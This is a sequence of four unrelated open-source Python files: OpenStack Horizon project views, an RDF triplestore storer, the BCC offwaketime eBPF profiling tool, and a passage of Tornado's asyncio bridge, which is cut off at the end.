"domain_name",
"name",
"description",
"enabled")
INDEX_URL = "horizon:identity:projects:index"
class TenantContextMixin(object):
@memoized.memoized_method
def get_object(self):
tenant_id = self.kwargs['tenant_id']
try:
return api.keystone.tenant_get(self.request, tenant_id, admin=True)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project information.'),
redirect=reverse(INDEX_URL))
def get_context_data(self, **kwargs):
context = super(TenantContextMixin, self).get_context_data(**kwargs)
context['tenant'] = self.get_object()
return context
class IndexView(tables.DataTableView):
table_class = project_tables.TenantsTable
template_name = 'identity/projects/index.html'
page_title = _("Projects")
def needs_filter_first(self, table):
return self._needs_filter_first
def has_more_data(self, table):
return self._more
def get_data(self):
tenants = []
marker = self.request.GET.get(
project_tables.TenantsTable._meta.pagination_param, None)
self._more = False
filters = self.get_filters()
self._needs_filter_first = False
if policy.check((("identity", "identity:list_projects"),),
self.request):
# If filter_first is set and if there are not other filters
# selected, then search criteria must be provided and
# return an empty list
if (setting_utils.get_dict_config(
'FILTER_DATA_FIRST', 'identity.projects') and not filters):
self._needs_filter_first = True
self._more = False
return tenants
domain_id = identity.get_domain_id_for_operation(self.request)
try:
tenants, self._more = api.keystone.tenant_list(
self.request,
domain=domain_id,
paginate=True,
filters=filters,
marker=marker)
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve project list."))
elif policy.check((("identity", "identity:list_user_projects"),),
self.request):
try:
tenants, self._more = api.keystone.tenant_list(
self.request,
user=self.request.user.id,
paginate=True,
marker=marker,
filters=filters,
admin=False)
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve project information."))
else:
msg = \
_("Insufficient privilege level to view project information.")
messages.info(self.request, msg)
if api.keystone.VERSIONS.active >= 3:
domain_lookup = api.keystone.domain_lookup(self.request)
for t in tenants:
t.domain_name = domain_lookup.get(t.domain_id)
return tenants
class ProjectUsageView(usage.UsageView):
table_class = usage.ProjectUsageTable
usage_class = usage.ProjectUsage
template_name = 'identity/projects/usage.html'
csv_response_class = project_views.ProjectUsageCsvRenderer
csv_template_name = 'project/overview/usage.csv'
page_title = _("Project Usage")
def get_data(self):
super(ProjectUsageView, self).get_data()
return self.usage.get_instances()
class CreateProjectView(workflows.WorkflowView):
workflow_class = project_workflows.CreateProject
def get_initial(self):
initial = super(CreateProjectView, self).get_initial()
# Set the domain of the project
domain = api.keystone.get_default_domain(self.request)
initial["domain_id"] = domain.id
initial["domain_name"] = domain.name
return initial
class UpdateProjectView(workflows.WorkflowView):
workflow_class = project_workflows.UpdateProject
def get_initial(self):
initial = super(UpdateProjectView, self).get_initial()
project_id = self.kwargs['tenant_id']
initial['project_id'] = project_id
try:
# get initial project info
project_info = api.keystone.tenant_get(self.request, project_id,
admin=True)
for field in PROJECT_INFO_FIELDS:
initial[field] = getattr(project_info, field, None)
if keystone.VERSIONS.active >= 3:
# get extra columns info
ex_info = settings.PROJECT_TABLE_EXTRA_INFO
for ex_field in ex_info:
initial[ex_field] = getattr(project_info, ex_field, None)
# Retrieve the domain name where the project belong
try:
if policy.check((("identity", "identity:get_domain"),),
self.request):
domain = api.keystone.domain_get(self.request,
initial["domain_id"])
initial["domain_name"] = domain.name
else:
domain = api.keystone.get_default_domain(self.request)
initial["domain_name"] = domain.name
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project domain.'),
redirect=reverse(INDEX_URL))
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project details.'),
redirect=reverse(INDEX_URL))
return initial
class UpdateQuotasView(workflows.WorkflowView):
workflow_class = project_workflows.UpdateQuota
def get_initial(self):
initial = super(UpdateQuotasView, self).get_initial()
project_id = self.kwargs['tenant_id']
initial['project_id'] = project_id
try:
# get initial project quota
if keystone.is_cloud_admin(self.request):
quota_data = quotas.get_tenant_quota_data(self.request,
tenant_id=project_id)
for field in quotas.QUOTA_FIELDS:
initial[field] = quota_data.get(field).limit
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project quotas.'),
redirect=reverse(INDEX_URL))
initial['disabled_quotas'] = quotas.get_disabled_quotas(self.request)
return initial
class DetailProjectView(tabs.TabView):
tab_group_class = project_tabs.ProjectDetailTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ project.name }}"
def get_context_data(self, **kwargs):
context = super(DetailProjectView, self).get_context_data(**kwargs)
project = self.get_data()
table = project_tables.TenantsTable(self.request)
context["project"] = project
context["url"] = reverse(INDEX_URL)
context["actions"] = table.render_row_actions(project)
return context
@memoized.memoized_method
def get_data(self):
try:
project_id = self.kwargs['project_id']
project = api.keystone.tenant_get(self.request, project_id)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project details.'),
redirect=reverse(INDEX_URL))
return project
def get_tabs(self, request, *args, **kwargs):
project = self.get_data()
return self.tab_group_class(request, project=project, **kwargs)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Silvio Peroni <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
__author__ = 'essepuntato'
from SPARQLWrapper import SPARQLWrapper
from reporter import Reporter
import re
import os
from rdflib import Graph, BNode, ConjunctiveGraph
import shutil
import json
from datetime import datetime
import argparse
import io
from conf_spacin import *
from support import find_paths, has_bib_entity_number
class Storer(object):
def __init__(self, graph_set=None, repok=None, reperr=None,
context_map={}, dir_split=0, n_file_item=1):
self.dir_split = dir_split
self.n_file_item = n_file_item
self.context_map = context_map
for context_url in context_map:
context_file_path = context_map[context_url]
with open(context_file_path) as f:
context_json = json.load(f)
self.context_map[context_url] = context_json
if graph_set is None:
self.g = []
else:
self.g = graph_set.graphs()
if repok is None:
self.repok = Reporter(prefix="[Storer: INFO] ")
else:
self.repok = repok
if reperr is None:
self.reperr = Reporter(prefix="[Storer: ERROR] ")
else:
self.reperr = reperr
self.preface_query = ""
def store_all(self, base_dir, base_iri, context_path, tmp_dir=None, g_set=[], override=False):
for g in g_set:
self.g += [g]
self.repok.new_article()
self.reperr.new_article()
self.repok.add_sentence("Starting the process")
processed_graphs = {}
for cur_g in self.g:
processed_graphs = self.store(cur_g, base_dir, base_iri, context_path, tmp_dir,
override, processed_graphs, False)
stored_graph_path = []
for cur_file_path in processed_graphs:
stored_graph_path += [cur_file_path]
self.__store_in_file(processed_graphs[cur_file_path], cur_file_path, context_path)
return stored_graph_path
def upload_and_store(self, base_dir, triplestore_url, base_iri, context_path,
tmp_dir=None, g_set=[], override=False):
stored_graph_path = self.store_all(base_dir, base_iri, context_path, tmp_dir, g_set, override)
# Some graphs were not stored properly, then no one will be updloaded to the triplestore
# but we highlights those ones that could be added in principle, by mentioning them
# with a ".notupdloaded" marker
if None in stored_graph_path:
for file_path in stored_graph_path:
# Create a marker for the file not uploaded in the triplestore
open("%s.notuploaded" % file_path, "w").close()
self.reperr.add_sentence("[6] "
"The statements of in the JSON-LD file '%s' were not "
"uploaded into the triplestore." % file_path)
else: # All the files have been stored
self.upload_all(self.g, triplestore_url, base_dir)
def __query(self, query_string, triplestore_url, n_statements=None, base_dir=None):
if query_string != "":
try:
tp = SPARQLWrapper(triplestore_url)
tp.setMethod('POST')
tp.setQuery(query_string)
tp.query()
if n_statements is None:
self.repok.add_sentence(
"Triplestore updated by means of a SPARQL Update query.")
else:
self.repok.add_sentence(
"Triplestore updated with %s more RDF statements." % n_statements)
return True
except Exception as e:
self.reperr.add_sentence("[1] "
"Graph was not loaded into the "
"triplestore due to communication problems: %s" % str(e))
if base_dir is not None:
tp_err_dir = base_dir + os.sep + "tp_err"
if not os.path.exists(tp_err_dir):
os.makedirs(tp_err_dir)
cur_file_err = tp_err_dir + os.sep + \
datetime.now().strftime('%Y-%m-%d-%H-%M-%S-%f_not_uploaded.txt')
with io.open(cur_file_err, "w", encoding="utf-8") as f:
f.write(query_string)
return False
def upload_all(self, all_g, triplestore_url, base_dir):
result = True
self.repok.new_article()
self.reperr.new_article()
query_string = None
total_new_statements = None
for idx, cur_g in enumerate(all_g):
cur_idx = idx % 10
if cur_idx == 0:
if query_string is not None:
result &= self.__query(query_string, triplestore_url, total_new_statements, base_dir)
query_string = u""
total_new_statements = 0
else:
query_string += u" ; "
total_new_statements += len(cur_g)
query_string += self.get_preface_query(cur_g) + Storer._make_insert_query(cur_g)
if query_string is not None and query_string != "":
result &= self.__query(query_string, triplestore_url, total_new_statements, base_dir)
return result
def execute_upload_query(self, query_string, triplestore_url):
self.repok.new_article()
self.reperr.new_article()
return self.__query(query_string, triplestore_url)
def upload(self, cur_g, triplestore_url):
self.repok.new_article()
self.reperr.new_article()
query_string = Storer._make_insert_query(cur_g)
return self.__query(query_string, triplestore_url, len(cur_g))
def set_preface_query(self, query_string):
self.preface_query = query_string
def get_preface_query(self, cur_g):
if self.preface_query != "":
if type(cur_g.identifier) is BNode:
return u"CLEAR DEFAULT ; "
else:
return u"WITH <%s> " % str(cur_g.identifier) + self.preface_query + " ; "
else:
return ""
@staticmethod
def _make_insert_query(cur_g):
if type(cur_g.identifier) is BNode:
return u"INSERT DATA { %s }" % cur_g.serialize(format="nt")
else:
return u"INSERT DATA { GRAPH <%s> { %s } }" % \
(str(cur_g.identifier), cur_g.serialize(format="nt"))
def __store_in_file(self, cur_g, cur_file_path, context_path):
cur_json_ld = json.loads(
cur_g.serialize(format="json-ld", context=self.__get_context(context_path)))
if isinstance(cur_json_ld, dict):
cur_json_ld["@context"] = context_path
else: # it is a list
for item in cur_json_ld:
item["@context"] = context_path
with open(cur_file_path, "w") as f:
json.dump(cur_json_ld, f, indent=4)
self.repok.add_sentence("File '%s' added." % cur_file_path)
def store(self, cur_g, base_dir, base_iri, context_path, tmp_dir=None,
override=False, already_processed={}, store_now=True):
self.repok.new_article()
self.reperr.new_article()
if len(cur_g) > 0:
cur_subject = set(cur_g.subjects(None, None)).pop()
cur_dir_path, cur_file_path = find_paths(
str(cur_subject), base_dir, base_iri, self.dir_split, self.n_file_item)
try:
if not os.path.exists(cur_dir_path):
os.makedirs(cur_dir_path)
final_g = ConjunctiveGraph()
final_g.addN([item + (cur_g.identifier,) for item in list(cur_g)])
# Merging the data
if not override:
if cur_file_path in already_processed:
stored_g = already_processed[cur_file_path]
stored_g.addN(final_g.quads((None, None, None, None)))
final_g = stored_g
elif os.path.exists(cur_file_path):
# This is a conjunctive graps that contains all the triples (and graphs)
# the file is actually defining - they could be more than those using
# 'cur_subject' as subject.
final_g = self.load(cur_file_path, cur_g, tmp_dir)
already_processed[cur_file_path] = final_g
if store_now:
self.__store_in_file(final_g, cur_file_path, context_path)
return already_processed
except Exception as e:
self.reperr.add_sentence("[5] It was impossible to store the RDF statements in %s. %s" %
(cur_file_path, str(e)))
return None
def __get_context(self, context_url):
if context_url in self.context_map:
return self.context_map[context_url]
else:
return context_url
def __get_first_context(self):
for context_url in self.context_map:
return self.context_map[context_url]
def load(self, rdf_file_path, cur_graph=None, tmp_dir=None):
self.repok.new_article()
self.reperr.new_article()
if os.path.isfile(rdf_file_path):
try:
cur_graph = self.__load_graph(rdf_file_path, cur_graph)
except IOError:
if tmp_dir is not None:
current_file_path = tmp_dir + os.sep + "tmp_rdf_file.rdf"
shutil.copyfile(rdf_file_path, current_file_path)
try:
cur_graph = self.__load_graph(current_file_path, cur_graph)
except IOError as e:
self.reperr.add_sentence("[2] "
"It was impossible to handle the format used for "
"storing the file (stored in the temporary path) '%s'. "
"Additional details: %s"
% (current_file_path, str(e)))
os.remove(current_file_path)
else:
self.reperr.add_sentence("[3] "
"It was impossible to try to load the file from the "
"temporary path '%s' since that has not been specified in "
"advance" % rdf_file_path)
else:
self.reperr.add_sentence("[4] "
"The file specified ('%s') doesn't exist."
% rdf_file_path)
return cur_graph
def __load_graph(self, file_path, cur_graph=None):
formats = ["json-ld", "rdfxml", "turtle", "trig"]
current_graph = ConjunctiveGraph()
if cur_graph is not None:
current_graph.parse(data=cur_graph.serialize(format="trig"), format="trig")
for cur_format in formats:
try:
if cur_format == "json-ld":
with open(file_path) as f:
json_ld_file = json.load(f)
if isinstance(json_ld_file, dict):
json_ld_file = [json_ld_file]
for json_ld_resource in json_ld_file:
# Trick to force the use of a pre-loaded context if the format
# specified is JSON-LD
context_json = None
if "@context" in json_ld_resource:
cur_context = json_ld_resource["@context"]
if cur_context in self.context_map:
context_json = self.__get_context(cur_context)["@context"]
json_ld_resource["@context"] = context_json
current_graph.parse(data=json.dumps(json_ld_resource), format=cur_format)
else:
current_graph.parse(file_path, format=cur_format)
return current_graph
except Exception as e:
errors = " | " + str(e) # Try another format
raise IOError("1", "It was impossible to handle the format used for storing the file '%s'%s" %
(file_path, errors))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser("storer.py")
arg_parser.add_argument("-i", "--input", dest="input", required=True,
help="The file containing the query to execute, the JSON-LD to upload, "
"or a directory containing several files with both queries and RDF.")
arg_parser.add_argument("-c", "--conf", dest="conf",
help="The name of the module with particular service configuration to "
"import. If it is left unspecified, the script will use the "
"default one ('i.e. conf_spacin').")
args = arg_parser.parse_args()
if args.conf is not None:
my_conf = __import__(args.conf)
for attr in dir(my_conf):
if not attr.startswith("__"):
globals()[attr] = getattr(my_conf, attr)
storer = Storer(repok=Reporter(True), reperr=Reporter(True),
context_map={context_path: context_file_path})
all_files = []
if os.path.isdir(args.input):
for cur_dir, cur_subdir, cur_files in os.walk(args.input):
for cur_file in cur_files:
full_path = cur_dir + os.sep + cur_file
if re.search(os.sep + "prov" + os.sep, full_path) is None and \
not full_path.endswith("index.json"):
all_files += [full_path]
else:
all_files += [args.input]
for cur_file in all_files:
if not os.path.basename(cur_file).startswith("index"):
storer.repok.new_article()
storer.repok.add_sentence("Processing file '%s'" % cur_file)
if cur_file.endswith(".txt"):
with io.open(cur_file, "r", encoding="utf-8") as f:
query_string = f.read()
storer.execute_upload_query(query_string, triplestore_url)
elif cur_file.endswith(".json"):
conj_g = storer.load(cur_file, tmp_dir=temp_dir_for_rdf_loading)
for cur_g in conj_g.contexts():
storer.upload(cur_g, triplestore_url)
storer.repok.write_file("storer_ok.txt")
storer.reperr.write_file("storer_err.txt")
|
|
#!/usr/bin/python
#
# offwaketime Summarize blocked time by kernel off-CPU stack + waker stack
# For Linux, uses BCC, eBPF.
#
# USAGE: offwaketime [-h] [-u] [-p PID] [-T] [duration]
#
# The current implementation uses an unrolled loop for x86_64, and was written
# as a proof of concept. This implementation should be replaced in the future
# with an appropriate bpf_ call, when available.
#
# The Off-CPU stack is currently limited to a stack trace depth of 20
# (maxtdepth), and the waker stack limited to 10 (maxwdepth). This is also
# limited to kernel stacks, and x86_64 only. Check for future versions, where
# these limitations should be removed.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 20-Jan-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from time import sleep
import argparse
import signal
# arguments
examples = """examples:
./offwaketime # trace off-CPU + waker stack time until Ctrl-C
./offwaketime 5 # trace for 5 seconds only
./offwaketime -f 5 # 5 seconds, and output in folded format
./offwaketime -u # don't include kernel threads (user only)
./offwaketime -p 185 # trace fo PID 185 only
"""
parser = argparse.ArgumentParser(
description="Summarize blocked time by kernel stack trace + waker stack",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-u", "--useronly", action="store_true",
help="user threads only (no kernel threads)")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("-v", "--verbose", action="store_true",
help="show raw addresses")
parser.add_argument("-f", "--folded", action="store_true",
help="output folded format")
parser.add_argument("duration", nargs="?", default=99999999,
help="duration of trace, in seconds")
args = parser.parse_args()
folded = args.folded
duration = int(args.duration)
debug = 0
maxwdepth = 10 # and MAXWDEPTH
maxtdepth = 20 # and MAXTDEPTH
if args.pid and args.useronly:
print("ERROR: use either -p or -u.")
exit()
# signal handler
def signal_ignore(signal, frame):
print()
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/sched.h>
#define MAXWDEPTH 10
#define MAXTDEPTH 20
#define MINBLOCK_US 1
struct key_t {
char waker[TASK_COMM_LEN];
char target[TASK_COMM_LEN];
u64 wret[MAXWDEPTH];
u64 tret[MAXTDEPTH];
};
BPF_HASH(counts, struct key_t);
BPF_HASH(start, u32);
struct wokeby_t {
char name[TASK_COMM_LEN];
u64 ret[MAXWDEPTH];
};
BPF_HASH(wokeby, u32, struct wokeby_t);
static u64 get_frame(u64 *bp) {
if (*bp) {
// The following stack walker is x86_64 specific
u64 ret = 0;
if (bpf_probe_read(&ret, sizeof(ret), (void *)(*bp+8)))
return 0;
if (bpf_probe_read(bp, sizeof(*bp), (void *)*bp))
*bp = 0;
if (ret < __START_KERNEL_map)
return 0;
return ret;
}
return 0;
}
int waker(struct pt_regs *ctx, struct task_struct *p) {
u32 pid = p->pid;
if (!(FILTER))
return 0;
u64 bp = 0;
struct wokeby_t woke = {};
int depth = 0;
bpf_get_current_comm(&woke.name, sizeof(woke.name));
bp = ctx->bp;
// unrolled loop (MAXWDEPTH):
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
woke.ret[depth] = get_frame(&bp);
out:
wokeby.update(&pid, &woke);
return 0;
}
int oncpu(struct pt_regs *ctx, struct task_struct *p) {
u32 pid = p->pid;
u64 ts, *tsp;
// record previous thread sleep time
if (FILTER) {
ts = bpf_ktime_get_ns();
start.update(&pid, &ts);
}
// calculate current thread's delta time
pid = bpf_get_current_pid_tgid();
tsp = start.lookup(&pid);
if (tsp == 0)
return 0; // missed start or filtered
u64 delta = bpf_ktime_get_ns() - *tsp;
start.delete(&pid);
delta = delta / 1000;
if (delta < MINBLOCK_US)
return 0;
// create map key
u64 zero = 0, *val, bp = 0;
int depth = 0;
struct key_t key = {};
struct wokeby_t *woke;
bpf_get_current_comm(&key.target, sizeof(key.target));
bp = ctx->bp;
// unrolled loop (MAXTDEPTH):
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
key.tret[depth] = get_frame(&bp);
out:
woke = wokeby.lookup(&pid);
if (woke) {
__builtin_memcpy(&key.wret, woke->ret, sizeof(key.wret));
__builtin_memcpy(&key.waker, woke->name, TASK_COMM_LEN);
wokeby.delete(&pid);
}
val = counts.lookup_or_init(&key, &zero);
(*val) += delta;
return 0;
}
"""
if args.pid:
filter = 'pid == %s' % args.pid
elif args.useronly:
filter = '!(p->flags & PF_KTHREAD)'
else:
filter = '1'
bpf_text = bpf_text.replace('FILTER', filter)
if debug:
print(bpf_text)
# initialize BPF
b = BPF(text=bpf_text)
b.attach_kprobe(event="finish_task_switch", fn_name="oncpu")
b.attach_kprobe(event="try_to_wake_up", fn_name="waker")
matched = b.num_open_kprobes()
if matched == 0:
print("0 functions traced. Exiting.")
exit()
# header
if not folded:
print("Tracing blocked time (us) by kernel off-CPU and waker stack",
end="")
if duration < 99999999:
print(" for %d secs." % duration)
else:
print("... Hit Ctrl-C to end.")
# output
while (1):
try:
sleep(duration)
except KeyboardInterrupt:
# as cleanup can take many seconds, trap Ctrl-C:
signal.signal(signal.SIGINT, signal_ignore)
if not folded:
print()
counts = b.get_table("counts")
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
if folded:
# fold target stack
line = k.target + ";"
for i in reversed(range(0, maxtdepth)):
if k.tret[i] == 0:
continue
line = line + b.ksym(k.tret[i])
if i != 0:
line = line + ";"
# add delimiter
line = line + ";-"
# fold waker stack
for i in range(0, maxwdepth):
line = line + ";"
if k.wret[i] == 0:
break
line = line + b.ksym(k.wret[i])
if i != 0:
line = line + ";" + k.waker
# print as a line
print("%s %d" % (line, v.value))
else:
# print wakeup name then stack in reverse order
print(" %-16s %s" % ("waker:", k.waker))
for i in reversed(range(0, maxwdepth)):
if k.wret[i] == 0:
continue
print(" %-16x %s" % (k.wret[i],
b.ksym(k.wret[i])))
# print delimiter
print(" %-16s %s" % ("-", "-"))
# print default multi-line stack output
for i in range(0, maxtdepth):
if k.tret[i] == 0:
break
print(" %-16x %s" % (k.tret[i],
b.ksym(k.tret[i])))
print(" %-16s %s" % ("target:", k.target))
print(" %d\n" % v.value)
counts.clear()
if not folded:
print("Detaching...")
exit()
|
|
"""Bridges between the `asyncio` module and Tornado IOLoop.
.. versionadded:: 3.2
This module integrates Tornado with the ``asyncio`` module introduced
in Python 3.4. This makes it possible to combine the two libraries on
the same event loop.
.. deprecated:: 5.0
While the code in this module is still used, it is now enabled
automatically when `asyncio` is available, so applications should
no longer need to refer to this module directly.
.. note::
Tornado requires the `~asyncio.AbstractEventLoop.add_reader` family of
methods, so it is not compatible with the `~asyncio.ProactorEventLoop` on
Windows. Use the `~asyncio.SelectorEventLoop` instead.
"""
import concurrent.futures
import functools
from threading import get_ident
from tornado.gen import convert_yielded
from tornado.ioloop import IOLoop, _Selectable
import asyncio
import typing
from typing import Any, TypeVar, Awaitable, Callable, Union, Optional
if typing.TYPE_CHECKING:
from typing import Set, Dict, Tuple # noqa: F401
_T = TypeVar("_T")
class BaseAsyncIOLoop(IOLoop):
def initialize( # type: ignore
self, asyncio_loop: asyncio.AbstractEventLoop, **kwargs: Any
) -> None:
self.asyncio_loop = asyncio_loop
# Maps fd to (fileobj, handler function) pair (as in IOLoop.add_handler)
self.handlers = {} # type: Dict[int, Tuple[Union[int, _Selectable], Callable]]
# Set of fds listening for reads/writes
self.readers = set() # type: Set[int]
self.writers = set() # type: Set[int]
self.closing = False
# If an asyncio loop was closed through an asyncio interface
# instead of IOLoop.close(), we'd never hear about it and may
# have left a dangling reference in our map. In case an
# application (or, more likely, a test suite) creates and
# destroys a lot of event loops in this way, check here to
# ensure that we don't have a lot of dead loops building up in
# the map.
#
# TODO(bdarnell): consider making self.asyncio_loop a weakref
# for AsyncIOMainLoop and make _ioloop_for_asyncio a
# WeakKeyDictionary.
for loop in list(IOLoop._ioloop_for_asyncio):
if loop.is_closed():
del IOLoop._ioloop_for_asyncio[loop]
IOLoop._ioloop_for_asyncio[asyncio_loop] = self
self._thread_identity = 0
super(BaseAsyncIOLoop, self).initialize(**kwargs)
def assign_thread_identity() -> None:
self._thread_identity = get_ident()
self.add_callback(assign_thread_identity)
def close(self, all_fds: bool = False) -> None:
self.closing = True
for fd in list(self.handlers):
fileobj, handler_func = self.handlers[fd]
self.remove_handler(fd)
if all_fds:
self.close_fd(fileobj)
# Remove the mapping before closing the asyncio loop. If this
# happened in the other order, we could race against another
# initialize() call which would see the closed asyncio loop,
# assume it was closed from the asyncio side, and do this
# cleanup for us, leading to a KeyError.
del IOLoop._ioloop_for_asyncio[self.asyncio_loop]
self.asyncio_loop.close()
def add_handler(
self, fd: Union[int, _Selectable], handler: Callable[..., None], events: int
) -> None:
fd, fileobj = self.split_fd(fd)
if fd in self.handlers:
raise ValueError("fd %s added twice" % fd)
self.handlers[fd] = (fileobj, handler)
if events & IOLoop.READ:
self.asyncio_loop.add_reader(fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
if events & IOLoop.WRITE:
self.asyncio_loop.add_writer(fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
def update_handler(self, fd: Union[int, _Selectable], events: int) -> None:
fd, fileobj = self.split_fd(fd)
if events & IOLoop.READ:
if fd not in self.readers:
self.asyncio_loop.add_reader(fd, self._handle_events, fd, IOLoop.READ)
self.readers.add(fd)
else:
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if events & IOLoop.WRITE:
if fd not in self.writers:
self.asyncio_loop.add_writer(fd, self._handle_events, fd, IOLoop.WRITE)
self.writers.add(fd)
else:
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
def remove_handler(self, fd: Union[int, _Selectable]) -> None:
fd, fileobj = self.split_fd(fd)
if fd not in self.handlers:
return
if fd in self.readers:
self.asyncio_loop.remove_reader(fd)
self.readers.remove(fd)
if fd in self.writers:
self.asyncio_loop.remove_writer(fd)
self.writers.remove(fd)
del self.handlers[fd]
def _handle_events(self, fd: int, events: int) -> None:
fileobj, handler_func = self.handlers[fd]
handler_func(fileobj, events)
def start(self) -> None:
try:
old_loop = asyncio.get_event_loop()
except (RuntimeError, AssertionError):
old_loop = None # type: ignore
try:
self._setup_logging()
asyncio.set_event_loop(self.asyncio_loop)
self.asyncio_loop.run_forever()
finally:
asyncio.set_event_loop(old_loop)
def stop(self) -> None:
self.asyncio_loop.stop()
def call_at(
self, when: float, callback: Callable[..., None], *args: Any, **kwargs: Any
) -> object:
# asyncio.call_at supports *args but not **kwargs, so bind them here.
# We do not synchronize self.time and asyncio_loop.time, so
# convert from absolute to relative.
return self.asyncio_loop.call_later(
max(0, when - self.time()),
self._run_callback,
functools.partial(callback, *args, **kwargs),
)
def remove_timeout(self, timeout: object) -> None:
timeout.cancel() # type: ignore
def add_callback(self, callback: Callable, *args: Any, **kwargs: Any) -> None:
if get_ident() == self._thread_identity:
call_soon = self.asyncio_loop.call_soon
else:
call_soon = self.asyncio_loop.call_soon_threadsafe
try:
call_soon(self._run_callback, functools.partial(callback, *args, **kwargs))
except RuntimeError:
# "Event loop is closed". Swallow the exception for
# consistency with PollIOLoop (and logical consistency
# with the fact that we can't guarantee that an
# add_callback that completes without error will
# eventually execute).
pass
def add_callback_from_signal(
self, callback: Callable, *args: Any, **kwargs: Any
) -> None:
try:
self.asyncio_loop.call_soon_threadsafe(
self._run_callback, functools.partial(callback, *args, **kwargs)
)
except RuntimeError:
pass
def run_in_executor(
self,
executor: Optional[concurrent.futures.Executor],
func: Callable[..., _T],
*args: Any
) -> Awaitable[_T]:
return self.asyncio_loop.run_in_executor(executor, func, *args)
def set_default_executor(self, executor: concurrent.futures.Executor) -> None:
return self.asyncio_loop.set_default_executor(executor)
class AsyncIOMainLoop(BaseAsyncIOLoop):
"""``AsyncIOMainLoop`` creates an `.IOLoop` that corresponds to the
current ``asyncio`` event loop (i.e. the one returned by
``asyncio.get_event_loop()``).
.. deprecated:: 5.0
Now used automatically when appropriate; it is no longer necessary
to refer to this class directly.
.. versionchanged:: 5.0
Closing an `AsyncIOMainLoop` now closes the underlying asyncio loop.
"""
def initialize(self, **kwargs: Any) -> None: # type: ignore
super(AsyncIOMainLoop, self).initialize(asyncio.get_event_loop(), **kwargs)
def make_current(self) -> None:
# AsyncIOMainLoop already refers to the current asyncio loop so
# nothing to do here.
pass
class AsyncIOLoop(BaseAsyncIOLoop):
"""``AsyncIOLoop`` is an `.IOLoop` that runs on an ``asyncio`` event loop.
This class follows the usual Tornado semantics for creating new
``IOLoops``; these loops are not necessarily related to the
``asyncio`` default event loop.
Each ``AsyncIOLoop`` creates a new ``asyncio.EventLoop``; this object
can be accessed with the ``asyncio_loop`` attribute.
.. versionchanged:: 5.0
When an ``AsyncIOLoop`` becomes the current `.IOLoop`, it also sets
the current `asyncio` event loop.
.. deprecated:: 5.0
Now used automatically when appropriate; it is no longer necessary
to refer to this class directly.
"""
def initialize(self, **kwargs: Any) -> None: # type: ignore
self.is_current = False
loop = asyncio.new_event_loop()
try:
super(AsyncIOLoop, self).initialize(loop, **kwargs)
except Exception:
# If initialize() does not succeed (taking ownership of the loop),
# we have to close it.
loop.close()
raise
def close(self, all_fds: bool = False) -> None:
if self.is_current:
self.clear_current()
super(AsyncIOLoop, self).close(all_fds=all_fds)
def make_current(self) -> None:
if not self.is_current:
try:
self.old_asyncio = asyncio.get_event_loop()
except (RuntimeError, AssertionError):
self.old_asyncio = None # type: ignore
self.is_current = True
asyncio.set_event_loop(self.asyncio_loop)
def _clear_current_hook(self) -> None:
if self.is_current:
